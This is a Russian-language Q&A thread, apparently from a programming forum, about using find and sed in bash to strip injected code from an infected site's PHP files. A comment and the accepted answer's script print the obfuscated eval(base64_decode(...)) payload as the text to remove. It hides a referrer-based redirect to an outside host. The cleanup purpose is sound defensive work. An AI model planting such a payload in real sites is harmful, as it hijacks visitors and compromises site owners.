# Поиск и удаление строки из фаилов в каталогах с помощью bash

Tags: php, bash

Ну собственно косяк, был заражен сайт, куча php-шных файлов в каталогах, в которые дописался код, ну и требуется его удалить, есть наброски, но маловато понимания в bash, помогите довести до ума

```
find /var/archive/samba/download1/!/1 -type f -name '*.php'  -exec sed -e 's/$BAD/$GOOD/g' {} \;
```

где `$BAD` - то что надо заменить, `$GOOD` то , на что надо заменить, ну или удалить по возможности

D таком виде как есть пишет

> `find: paths must precede expression: -
> Usage: find [-H] [-L] [-P] [-Olevel] [-D help|tree|search|stat|rates|opt|exec] [`

Comment: содержимое $BAD примерно вот такое
**eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/=="));**

Comment: знак `!` в пути к файлам не всегда отрабатывает так, как ожидается.

Answer (score 2, accepted):

Как уже сказали, `!` из начального пути для `find` можно выкинуть. Для замены содержимого файла можно вызывать `sed` с параметром `-i`. Например, так:

```
find /путь/к/каталогу/откуда/начинать -type f -name \*.php | while read filename; do sed -i 's/$BAD/$GOOD/g' "${filename}"; done
```

Перед этим наверное есть смысл сохранить/запаковать всё то, что лежит в `/путь/к/каталогу/откуда/начинать` (мало ли что).

**Дополнение**

Там в тексте, который нужно вырезать, затесался слэш (/) - его нужно "заэкранировать" с помощью \ (исправить на \/). 
Такой скрипт работает (проверял), вместо `/путь/откуда/начинать` - свой каталог:

```
#!/bin/bash
GOOD=
BAD='eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw\/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7DQppZiAoIXN0cmlzdHIoJHJlZmVyZXIsImNhY2hlIikgb3IgIXN0cmlzdHIoJHJlZmVyZXIsImludXJsIikpewkJDQoJCWhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9uY29kZWVyLnFwb2UuY29tLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ=="));'
find /путь/откуда/начинать -type f -name \*.php | while read filename; do 
#   echo "\"$filename\":" 
    sed -i "s/${BAD}/${GOOD}/g" "${filename}" 
done
```